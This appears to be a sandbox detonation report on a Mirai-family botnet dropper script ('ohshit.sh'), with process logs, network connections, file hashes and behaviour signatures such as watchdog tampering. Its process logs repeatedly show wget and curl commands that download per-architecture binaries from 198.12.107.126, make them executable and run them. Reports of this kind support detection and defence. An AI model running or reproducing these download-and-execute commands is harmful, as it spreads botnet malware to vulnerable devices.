/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/cat

[cat camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/cat

[cat camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/cat

[cat camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/cat

[cat camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/cat

[cat camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/cat

[cat camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/cat

[cat camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/cat

[cat camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/cat

[cat camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-WmNdZD]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/cat

[cat camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/cat

[cat camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/cat

[cat camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/cat

[cat camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp

Files

/tmp/busybox

MD5 a39fe8036e559ce804e26518061e59ff
SHA1 8df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA256 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512 e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d

/tmp/camp.arc

MD5 36a7a1e959eaf7d6896505777912ecdf
SHA1 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA256 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA512 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0

/tmp/Chaotic

MD5 dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1 e83605a050e0aaad3dba360545a00036f083eb91
SHA256 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512 e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571

/tmp/Chaotic

MD5 62e0ec59f989335be5fbf630a49da4ea
SHA1 43bdde1afd1089008539973b08e35dd66fb7451a
SHA256 c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15
SHA512 ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95

/tmp/Chaotic

MD5 4c64afb0ad73da68d0e9dc8894d97f3a
SHA1 0d3f5938508079bf9dbbe13d75d7b91e21845312
SHA256 de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b
SHA512 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107

/tmp/Chaotic

MD5 adfc93deaed5f946d896d185a7a3672f
SHA1 30686df1ec33ec8941a6bd5471292ec4dfdc7522
SHA256 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd
SHA512 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f

memory/816-1-0x00400000-0x0045af60-memory.dmp

/tmp/Chaotic

MD5 69e35fed3302be73c0de271eae2690f7
SHA1 fdfb172bdcefc5f97d642c56e3771deffa0341c6
SHA256 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981
SHA512 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

debian9-mipsel-20240418-en

Max time kernel

138s

Max time network

145s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A
N/A /tmp/Chaotic /tmp/Chaotic N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/327/status /tmp/Chaotic N/A
File opened for reading /proc/432/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/76/status /tmp/Chaotic N/A
File opened for reading /proc/8/status /tmp/Chaotic N/A
File opened for reading /proc/17/status /tmp/Chaotic N/A
File opened for reading /proc/154/status /tmp/Chaotic N/A
File opened for reading /proc/702/status /tmp/Chaotic N/A
File opened for reading /proc/703/status /tmp/Chaotic N/A
File opened for reading /proc/5/status /tmp/Chaotic N/A
File opened for reading /proc/6/status /tmp/Chaotic N/A
File opened for reading /proc/18/status /tmp/Chaotic N/A
File opened for reading /proc/22/status /tmp/Chaotic N/A
File opened for reading /proc/24/status /tmp/Chaotic N/A
File opened for reading /proc/361/status /tmp/Chaotic N/A
File opened for reading /proc/705/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/2/status /tmp/Chaotic N/A
File opened for reading /proc/9/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/111/status /tmp/Chaotic N/A
File opened for reading /proc/149/status /tmp/Chaotic N/A
File opened for reading /proc/169/status /tmp/Chaotic N/A
File opened for reading /proc/358/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/14/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/708/status /tmp/Chaotic N/A
File opened for reading /proc/36/status /tmp/Chaotic N/A
File opened for reading /proc/68/status /tmp/Chaotic N/A
File opened for reading /proc/74/status /tmp/Chaotic N/A
File opened for reading /proc/81/status /tmp/Chaotic N/A
File opened for reading /proc/681/status /tmp/Chaotic N/A
File opened for reading /proc/788/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/10/status /tmp/Chaotic N/A
File opened for reading /proc/82/status /tmp/Chaotic N/A
File opened for reading /proc/120/status /tmp/Chaotic N/A
File opened for reading /proc/381/status /tmp/Chaotic N/A
File opened for reading /proc/667/status /tmp/Chaotic N/A
File opened for reading /proc/674/status /tmp/Chaotic N/A
File opened for reading /proc/842/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/23/status /tmp/Chaotic N/A
File opened for reading /proc/78/status /tmp/Chaotic N/A
File opened for reading /proc/376/status /tmp/Chaotic N/A
File opened for reading /proc/16/status /tmp/Chaotic N/A
File opened for reading /proc/19/status /tmp/Chaotic N/A
File opened for reading /proc/75/status /tmp/Chaotic N/A
File opened for reading /proc/670/status /tmp/Chaotic N/A
File opened for reading /proc/841/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/15/status /tmp/Chaotic N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/37/status /tmp/Chaotic N/A
File opened for reading /proc/84/status /tmp/Chaotic N/A
File opened for reading /proc/13/status /tmp/Chaotic N/A
File opened for reading /proc/77/status /tmp/Chaotic N/A
File opened for reading /proc/331/status /tmp/Chaotic N/A
File opened for reading /proc/697/status /tmp/Chaotic N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/cat

[cat camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/cat

[cat camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/cat

[cat camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/cat

[cat camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/cat

[cat camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/cat

[cat camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/cat

[cat camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/cat

[cat camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/cat

[cat camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/cat

[cat camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/cat

[cat camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/cat

[cat camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/cat

[cat camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:3778 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:80 198.12.107.126 tcp

Files

/tmp/busybox

MD5 6ffc46165b5d9726a6607f3ea5305589
SHA1 ab127220f42e816b413dde0d17031e251a7bc98f
SHA256 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

/tmp/camp.arc

MD5 36a7a1e959eaf7d6896505777912ecdf
SHA1 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA256 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA512 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0

/tmp/Chaotic

MD5 dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1 e83605a050e0aaad3dba360545a00036f083eb91
SHA256 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512 e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571

/tmp/Chaotic

MD5 62e0ec59f989335be5fbf630a49da4ea
SHA1 43bdde1afd1089008539973b08e35dd66fb7451a
SHA256 c3ae1058890bf151d5d464a608b68e2c377d4d31043e3883efb0d8a20685ab15
SHA512 ee8c5e36a0abc86c042630fcbd03f96459fe77cd8683498b77121c1a11befe59f72e3363989265317109f77df2d3c8633ccabc7e91581e3bdc363f29b8173b95

/tmp/Chaotic

MD5 4c64afb0ad73da68d0e9dc8894d97f3a
SHA1 0d3f5938508079bf9dbbe13d75d7b91e21845312
SHA256 de175c508f1a56aa4fd47e0aa8103566c46508823bd8800a71e1f354fa18db2b
SHA512 7e65132191ca5f83ac7ce6b7d63a3423175d3ab893a859c1de37fd9d22f4fd4c76cfc163405ddc6c6c2910c31831a3c0a4f3b86fa68a241c40f328823050e107

/tmp/Chaotic

MD5 adfc93deaed5f946d896d185a7a3672f
SHA1 30686df1ec33ec8941a6bd5471292ec4dfdc7522
SHA256 9ff7a99509c5186f028858692deb9b685bb196df414fad5822dec0f4efe90ccd
SHA512 94318e934aa23e1b9dfe4baa2dd1700986bea4343cf62bcac4c964876b42f70235260bc3ed4d367bf0501bfa334a5472a7307d258762cbf6d9c93b116263867f

/tmp/Chaotic

MD5 69e35fed3302be73c0de271eae2690f7
SHA1 fdfb172bdcefc5f97d642c56e3771deffa0341c6
SHA256 265c9eb70b9af05fc3e2cbeaf5a3505a76e5903b3e9286e70ba799c430f15981
SHA512 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2

memory/842-1-0x00400000-0x0045af60-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

139s

Max time network

150s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
